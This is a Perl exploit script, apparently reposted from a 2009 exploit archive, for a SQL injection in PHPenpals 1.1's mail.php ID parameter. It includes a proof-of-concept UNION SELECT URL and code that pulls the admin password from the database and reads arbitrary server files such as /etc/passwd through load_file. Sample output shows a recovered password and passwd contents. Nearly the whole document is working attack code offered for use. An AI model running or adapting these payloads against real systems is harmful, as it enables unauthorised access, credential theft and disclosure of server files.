PHPenpals <= 1.1 (mail.php ID) Remote SQL Injection Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

PHPenpals <= 1.1 (mail.php ID) Remote SQL Injection Exploit

来源：br0ly.Code@gmail.com 作者：Br0ly 发布时间：2009-05-18

#!usr/bin/perl
#|------------------------------------------------------------------------------------------------------------------
#| -Info:
#
#| -Name: Phpenpals
#| -Version: <= 1.1
#| -Site: http://sourceforge.net/projects/phpenpals/
#| -Download Script: http://sourceforge.net/project/showfiles.php?group_id=40166&package_id=32303&release_id=250717
#| -Bug: Sql Injection
#| -Found: by Br0ly
#| -BRAZIL >D
#| -Contact: br0ly.Code@gmail.com
#|
#| -Gretz: Osirys , xs86 , 6_Bl4ck9_f0x6 , str0ke
#|
#| -p0c:
#| -SQL INJECTION:
#|
#| -http://localhost/Scripts/phpenpals/mail.php?ID=-1+union+select+1,@@version--
#| -Vuls: @array = ('profile.php?personalID=' , 'mail.php?ID=')
#|
#| - You just need pass of the admin for login in:
#| - http://localhost/Scripts/phpenpals/admin.php
#|
#| -Exploit: Demo:
#|------------------------------------------------------------------------------------------------------------------
#|
#| perl phpenpals.txt http://localhost/Scripts/phpenpals/ 1
#|
#| --------------------------------------
#|   -Phpenpals
#|   -Sql Injection
#|   -by Br0ly
#| --------------------------------------
#|
#|[+] Getting the pass of the admin.
#|[+] Password = admin
#|
#|perl phpenpals.txt http://localhost/Scripts/phpenpals/ 2
#|
#| --------------------------------------
#|   -Phpenpals
#|   -Sql Injection
#|   -by Br0ly
#| --------------------------------------
#|
#|[*] Cat:/etc/passwd
#|
#|
#|root:x:0:0:root:/root:/bin/bash
#|daemon:x:1:1:daemon:/usr/sbin:/bin/sh
#|bin:x:2:2:bin:/bin:/bin/sh
#|sys:x:3:3:sys:/dev:/bin/sh
#|sync:x:4:65534:sync:/bin:/bin/sync
#|games:x:5:60:games:/usr/games:/bin/sh
#|man:x:6:12:man:/var/cache/man:/bin/sh
#|lp:x:7:7:lp:/var/spool/lpd:/bin/sh
#|
#| ;D
#| And sorry for my bad english ;/
#|

use IO::Socket::INET;
use LWP::UserAgent;

my $host      = $ARGV[0];
my $opcao     = $ARGV[1];
my $sql_path = "/mail.php?ID=";

if (@ARGV < 2) {
      &banner();
      &help("-1");
}

elsif(cheek($host,$opcao) == 1) {
      &banner();
      &xploit($host,$opcao,$sql_path);
}

else {
      &banner();
      help("-2");
}

sub xploit() {
      my $host     = $_[0];
      my $opcao    = $_[1];
      my $sql_path = $_[2];
      if($opcao == 1) { &adm_pass($host,$sql_path); }
      if($opcao == 2) { &file_load($host,$sql_path); }
}

sub adm_pass() {

      print "[+] Getting the pass of the admin.\n";
      my $host     = $_[0];
      my $spl_path = $_[1];
      my $sql_atk = $host.$spl_path."-1+union+select+1,concat(0x6272306c79,0x3a,password,0x3a,0x6272306c79)+from+admin--";
      my $re = get_url($sql_atk);
      if($re =~ /br0ly:(.+):br0ly/) {
    print "[+] Password = $1\n";
    exit(0);
      }
      else {
    print "[-] Exploit, Fail\n";
    exit(0);

      }
}

sub file_load() {

     my $host     = $_[0];
     my $spl_path = $_[1];

     print "[*] Cat:";
     my $file = <STDIN>;
     chomp($file);
     $file !~ /exit/ || die "[-] Quitting ..\n";

     if ($file !~ /\/(.*)/) {
    print "\n[-] Bad filename !\n";
    &file_load($host,$spl_path);
     }

     my $fencode = hex_str($file);
     my $byte = "0x";
     my $fl_atk = $host.$spl_path."-1+union+select+1,load_file(".$byte.$fencode.")--";
     my $re = get_url($fl_atk);
     my $content = tag($re);

     if ($content =~ /<table>\*\*<tr><td>(.+)<\/td><td><\/td><\/tr>/) {
    my $out = $1;

        $out =~ s/\$/ /g;
    $out =~ s/\*\*\*\*/ /g;
    $out =~ s/\*/\n/g;
    $out =~ s/Send/ /g;
    $out =~ s/email/ /g;
    $out =~ s/to/ /g;
        $out =~ s/$out/$out\n/ if ($out !~ /\n$/);
        print "$out";
    &file_load($host,$spl_path);

    if($out =~ ' ') {
      $c++;
      print "[-] Can't find ".$file." \n";
      if ( $c < 3 ) {
        print "[-] Exploit Fail\n\n";
        &file_load($host,$spl_path);
      }

      else { exit(0); }

    }
      }

}

sub get_url() {
    $link = $_[0];
    my $req = HTTP::Request->new(GET => $link);
    my $ua = LWP::UserAgent->new();
    $ua->timeout(4);
    my $response = $ua->request($req);
    return $response->content;
}

sub tag() {
    my $string = $_[0];
    $string =~ s/ /\$/g;
    $string =~ s/\s/\*/g;
    return($string);
}

sub hex_str () {

    my $str_1 = $_[0];
    my $str_hex = unpack('H*', "$str_1");
    return $str_hex;

}

sub cheek() {
    my $host = $_[0];
    my $opcao = $_[1];
    if (($host =~ /http:\/\/(.*)/) && (($opcao == 1 || $opcao == 2))) {
        return 1;
    }
    else {
        return 0;
    }
}

sub help() {

    my $error = $_[0];
    if ($error == -1) {
        print "\n[-] Error, missed some arguments !\n\n";
    }

    elsif ($error == -2) {

        print "\n[-] Error, Bad arguments !\n\n";
    }

    print "[*] Usage : perl $0 http://localhost/phpenpals/ opcao \n";
    print "    Ex:     perl $0 http://localhost/phpenpals/ 1\n";
    print "[*] opcao 1 : adm pass\n";
    print "[*] opcao 2 : file_disc\n";
    exit(0);
}

sub banner {
    print "\n".
          " --------------------------------------\n".
          "   -Phpenpals                       \n".
          "   -Sql Injection                       \n".
          "   -by Br0ly                            \n".
          " --------------------------------------\n\n";
}

[